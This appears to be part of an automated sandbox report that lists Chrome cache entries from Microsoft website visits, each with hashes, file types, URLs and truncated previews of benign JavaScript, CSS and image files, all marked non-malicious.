                                                                                                                      Preview:...........k[.H.0........F._...q.UE7....s..m..%$.I.....q.L.d....g....HyWdDdDdd...+.U....................9...vzvy.....`....C...A.....K.Q-.jqR..a.L........I...q.?...6I.?.a... ........%...d/..s.....Zp.DP{.O^..!.Eq.........^..M.......C.$.&q...Z.....:I..^..y._K..6....Q....h5.n........48..._.. .!N...X'...6.....8.Z..^..}.=At_..=........F.aV/|f.'O8.0..P<...R.{..:..i.R.O..A...............Tu.R..'0..2..Y<..!.-5...~].A..g.G...i.l5....F..,.....}.=L..a..1......._..F....N..L..1...O.0..A......\..Q.....g.}Y..h......?..$....4...L...ZdF..'.....;p.........{.^.v.wA=......Y..\..............?x..s. ...L.!......_'.....d.>....X6>.... ..y.w5...4i......E-.WW..9....5....83-...tgs;vgM.1.((...`l&.....4.j.\.4.:L;T..$w.8..:+M[d:...#*.X....vf.../........(.o........^.x/ZF..h/...3._c.wc..B......`n..\....$...K....z...,y!...W..b.WLEb.....oX.....4%.S$..nZ..H.........l..x......&vD.S.&...l.6 .H.....|>....].u|;..taJ^.0Jk.-fZ...!...[.(..8...7r.o.......Cbi.K...{.M.........)}DJF<.W..

                                                                                                                      Chrome Cache Entry: 278

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3637)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3690
                                                                                                                      Entropy (8bit):5.141541571595828
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Af3vI6YmI62HUbHbZbpVuJRDhxwC9jTx+IRcaOs/Z:Af3vI6YmI62HUrllgffOQZ
                                                                                                                      MD5:A249B03B72AB5E7B60E7806457B9BE61
                                                                                                                      SHA1:FF0B5F4FB91A9DBF147262AD59B292C6C2DFE122
                                                                                                                      SHA-256:48FF8C6449BEF199F206C7A1C49403E10DC6341A9D4A1F8946B042DDE66E315F
                                                                                                                      SHA-512:29F204E3813972DC76FCE3DD6715093646EB0DA52DEDAC5E7E09B618E5CF8703CDE95D463727EB29F90D461D0C5A73B5701EC39B994A268103A06306144A6F34
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/PromotionBanner.Main.min.js?v=SP-MZEm-8ZnyBsehxJQD4Q3GNBqdSh-JRrBC3eZuMV8
                                                                                                                      Preview:!function(){"use strict";var n;!function(n){n.PromotionBanner=".PromotionBanner",n.TopPageBanner=".TopPageBanner",n.AboveUhfBanner=".AboveUhfBanner",n.RailBanner=".RailBanner",n.NpsRailBanner=".NpsRailBanner",n.RailSecondaryCtaBanner=".RailSecondaryCtaBanner"}(n||(n={}));var e=[{dismissSelector:null,clickSelector:"#ucsTopBannerButtonLink",element:n.PromotionBanner},{dismissSelector:"#top-banner-dismiss-button",clickSelector:"#ucsTopBannerButtonLink",element:n.TopPageBanner},{dismissSelector:"#uhf-banner-close",clickSelector:"#upgradeUhfBannerButton",element:n.AboveUhfBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button",element:n.RailBanner},{dismissSelector:"#nps-rail-close",clickSelector:"#nps-rail-link",element:n.NpsRailBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button, #rail-banner-button-secondary",element:n.RailSecondaryCtaBanner}],t=function(){return t=Object.assign||function(n){for(var e,t=1,r=argument

                                                                                                                      Chrome Cache Entry: 279

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65298)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):372649
                                                                                                                      Entropy (8bit):5.092497147126706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:hkz1b3b99G9gR7N1xf6ilX1b3b99G9gR7N1xf6iPyD1b3b99G9gR7N1xf6ilfsPQ:6YfW1fvh8
                                                                                                                      MD5:C34FA6955BE9497F516B1D185D1450D8
                                                                                                                      SHA1:C2B45C4572E6B0398E3703CCFC1746D7D6CFC582
                                                                                                                      SHA-256:F6895205E6AFDDAB2E56E315FB74F0016F5ECD70F163FA978BB88504E8512398
                                                                                                                      SHA-512:56D1919BD4B6E00B43B9DBFE63E8570EDEAB2A4718EFD6A92ED3198835252CB5D817ABE625B166245C49AAD95FD99389680E2AA1BC083053980E6A8A6FFCDC5E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/main-light.min.ACSHASHc34fa6955be9497f516b1d185d1450d8.css
                                                                                                                      Preview:@charset "UTF-8";/*!. * MWF (Moray) Extensions v2.15.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2?v=2.15.1) format("woff2"),url(resources/fonts/MWFFluentIcons.woff?v=2.15.1) format("woff"),url(resources/fonts/MWFFluentIcons.ttf?v=2.15.1) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-micros

                                                                                                                      Chrome Cache Entry: 280

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (541)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3642
                                                                                                                      Entropy (8bit):5.399452635270733
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                      MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                      SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                      SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                      SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                                                                      Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse

                                                                                                                      Chrome Cache Entry: 281

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (505)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1418
                                                                                                                      Entropy (8bit):5.418786110345074
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                      MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                      SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                      SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                      SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.min.ACSHASH20aafdf6904d3dc5db0e0e33abbfc1a4.js
                                                                                                                      Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";

                                                                                                                      Chrome Cache Entry: 282

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3452
                                                                                                                      Entropy (8bit):5.117912766689607
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://login.live.com/Me.htm?v=3
                                                                                                                      Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.

                                                                                                                      Chrome Cache Entry: 283

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):138268
                                                                                                                      Entropy (8bit):5.224497765711851
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                      MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                      SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                      SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                      SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                      Malicious:false
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

                                                                                                                      Chrome Cache Entry: 284

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3814
                                                                                                                      Entropy (8bit):4.825091904954067
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:7kr61WqmaHkSP5yNGAvNdvMZTeGD9CEbRM5kbkp5uV:7kmsqmaHkSP5yNGUNdvMZyGD9CEbRM50
                                                                                                                      MD5:3BF229102AD109AFDE6F878686B1FAC3
                                                                                                                      SHA1:8133D2A6DF59C92B5D01F74980C384B2BE6EED15
                                                                                                                      SHA-256:328650220039CEABC55E03DFED12F60C837C2AA8EBB253E13F65DF3F1FD0C6B0
                                                                                                                      SHA-512:4762A15D82AC4A8FD9C3F0BEF0B3B57FCDB67C58CB9CD96621C14E1BADD9B0012A532A06F49F7A84F6D7A921B1BEF6E0996A5AA119DC12DEEC54F774513EE75F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/stickybanner/v1/stickybanner/clientlibs/site.min.ACSHASH3bf229102ad109afde6f878686b1fac3.css
                                                                                                                      Preview:.sticky-banner{transition:opacity 1s ease,transform 1s ease;padding:10px 0}..sticky-banner.sticky-banner-hide{transform:translate(0,100%)}..sticky-banner.stick-bottom{position:fixed;bottom:0;width:100%;z-index:99}..sticky-banner .banner-heading>*:first-child{margin:0 !important}..sticky-banner .banner-description>p{margin-bottom:5px}..sticky-banner .link-group a{border-radius:4px}..sticky-banner.button-variation .link-group .btn{padding:10px 25px}..sticky-banner.button-variation .btn-right-align{justify-content:end}..sticky-banner.button-variation .btn-left-align{justify-content:flex-end}..sticky-banner.text-button .justify-content-center.align-items-center{flex-direction:column}..sticky-banner .btn-right-align.align-items-start,.sticky-banner.text-button .row{align-items:center !important}..sticky-banner .btn-right-align.align-items-end{align-items:center !important;justify-content:flex-end !important}..sticky-banner .btn-right-align.align-items-center{align-items:center !important;ju

                                                                                                                      Chrome Cache Entry: 285

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1998)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):530473
                                                                                                                      Entropy (8bit):5.1558754449004525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:cJpYYYb5T2ZggigVl1e/zXJ5lbgutNPzedZTyatWYLe8dZshIw:cJpYb5T2Zggigv1e/zXJLbgunzedZTyT
                                                                                                                      MD5:13ABF4CF4F8384D04A599349524DBBAD
                                                                                                                      SHA1:BD1EE95DB4A6E7A1EE1937F47AD7C5B6D7633465
                                                                                                                      SHA-256:3E7CE05C8874B9F3628300101F40878DF98F23A09CD4ECC9C9E5CC8067D9068A
                                                                                                                      SHA-512:4FCA93D865844FFF1A452B343F75ED786111F1E508505DD841F954159A42E5B9CB587FDC8ADEEA431A14CD042FC4CF16305416CE4CA0C1E9D5E66803C2BD03A7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH13abf4cf4f8384d04a599349524dbbad.js
                                                                                                                      Preview:./*!. * MWF (Moray) Extensions v2.15.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {..typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :..typeof define === 'function' && define.amd ? define(['exports'], factory) :..(global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';...var commonjsGlobal = typeof globalThis !== 'undefined' ? globalThis : typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : typeof self !== 'undefined' ? self : {};...var check = function (it) {.. return it && it.Math == Math && it;..};...// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028..var global$a =.. // eslint-disable-next-line es/no-global-this -- safe.. check(typeof globalTh

                                                                                                                      Chrome Cache Entry: 286

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (524)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):980
                                                                                                                      Entropy (8bit):5.221020544248936
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ckGytSvuT/y67L/nV9jViHwukcglwYVTYVu:catwuby67pLRuxmwCTCu
                                                                                                                      MD5:EC8AED9DF755A7B27E52317DCF532DF8
                                                                                                                      SHA1:60F03B5BF43D1682D1CDB7DAF5A5A37FCD29D4E8
                                                                                                                      SHA-256:C152DD3ED8493299EA2712FFC15A0043F417FEDCF4159B2C993A006501D82AC4
                                                                                                                      SHA-512:16890D243CE2236AA2CD01C3C85D7B0AA1DB3DC8BF8B9CFE97AD18889F4030A0B6511C9F82C62F2BDA5F1029AFF4E12A9E35B0E182FC3B2B8B677618A589F5CF
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';$(document).ready(function(){var a=window.matchMedia("(prefers-color-scheme: dark)");a.addEventListener("change",function(k){{const d=document.querySelectorAll(".socialfollow .socialfollow-li img");if(d)for(var e=0;e<d.length;e++){var b=d[e].getAttribute("src"),g=d[e].getAttribute("data-src");b&&(k.matches?(-1<b.indexOf("\x26fmt\x3dpng-alpha")&&(b=b.replace("\x26fmt\x3dpng-alpha",""),d[e].setAttribute("src",b)),-1<b.indexOf("?fmt\x3dpng-alpha")&&(b=b.replace("?fmt\x3dpng-alpha",""),d[e].setAttribute("src",.b))):g&&d[e].setAttribute("src",g))}}});if(a.matches&&(a=document.querySelectorAll(".socialfollow .socialfollow-li img")))for(var f=0;f<a.length;f++){var c=a[f].getAttribute("src"),h=a[f].getAttribute("data-src");c&&(-1<c.indexOf("\x26fmt\x3dpng-alpha")?(c=c.replace("\x26fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):-1<c.indexOf("?fmt\x3dpng-alpha")?(c=c.replace("?fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):h&&a[f].setAttribute("src",h))}});

                                                                                                                      Chrome Cache Entry: 287

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):171505
                                                                                                                      Entropy (8bit):5.043804815226508
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                                      MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                      SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                      SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                      SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                      Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

                                                                                                                      Chrome Cache Entry: 288

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4565
                                                                                                                      Entropy (8bit):7.879534543139402
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                      MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                      SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                      SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                      SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/MSFT-Microsoft-sticky-logo-RE1Mu3b?fmt=png-alpha&scl=1
                                                                                                                      Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..

                                                                                                                      Chrome Cache Entry: 289

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65456)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1223686
                                                                                                                      Entropy (8bit):5.470883113843709
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:8uEPjek2NG0LmOkLrZ+DOR+rO0sOO322khnEZs4BeQ/7W6fC71zwFgopM9eiaYcn:8uEPj+NG0LmOkLrZ+DOR+r+OO322khnk
                                                                                                                      MD5:261012FF1027F9B1F28717BEA40973F6
                                                                                                                      SHA1:885F5D7A571E165EEA0E09BA86C16042D697AA6B
                                                                                                                      SHA-256:1F586745BEC9A6372D87011A3F110AFA51E3F72835E7A723D2E75544BFEFBBE1
                                                                                                                      SHA-512:88C3706F6E5A1392D49FCBBD3B8B33D5A522031427621275387BB7764E40B4AE1980ED5C3297EAC4E953EE91AA131AF69BB3DE816101675B907A705E5E2E2213
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/Support.Main.min.js?v=H1hnRb7JpjcthwEaPxEK-lHj9yg156cj0udVRL_vu-E
                                                                                                                      Preview:/*! For license information please see Support.Main.min.js.LICENSE.txt */.!function(){var e,t={7046:function(e,t){var n={parseBuffer:function(e){return new r(e).parse()},addBoxProcessor:function(e,t){"string"==typeof e&&"function"==typeof t&&(i.prototype._boxProcessors[e]=t)},createFile:function(){return new r},createBox:function(e,t,n){var r=i.create(e);return t&&t.append(r,n),r},createFullBox:function(e,t,r){var i=n.createBox(e,t,r);return i.version=0,i.flags=0,i},Utils:{}};n.Utils.dataViewToString=function(e,t){var n=t||"utf-8";if("undefined"!=typeof TextDecoder)return new TextDecoder(n).decode(e);var r=[],i=0;if("utf-8"===n)for(;i<e.byteLength;){var a=e.getUint8(i++);a<128||(a<224?(a=(31&a)<<6,a|=63&e.getUint8(i++)):a<240?(a=(15&a)<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++)):(a=(7&a)<<18,a|=(63&e.getUint8(i++))<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++))),r.push(String.fromCharCode(a))}else for(;i<e.byteLength;)r.push(String.fromCharCode(e.getUint8(i++)));return

                                                                                                                      Chrome Cache Entry: 290

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (601)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10434
                                                                                                                      Entropy (8bit):5.138897195822734
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ucdsngdKadwed0XdLIdLdOgdOudq/m0YdOK/KadqMdrudq/B2nded8vd7dtkkYdd:Nsg31oLYBlxq/bIH/Kyq8yq/B2d2YRtm
                                                                                                                      MD5:E5E717DDD1C394CD4371209C7CD8BD28
                                                                                                                      SHA1:B1B35E8AAEB2AA8E3A6F622DEF626AEF871A3BB3
                                                                                                                      SHA-256:8511F1B20AB4F34B58C0D65507297CE00B07F341E5CFC31E38169230FA295BF6
                                                                                                                      SHA-512:8DD6C2E6432FB0717F4472C6A8BA1B6B6F26C2B35F876DE2F9136F36FCA27DC05A9DC9FE5E912335F83A02BED765EE2BAAF3EAD87CD0B4A8A4204C8D75663325
                                                                                                                      Malicious:false
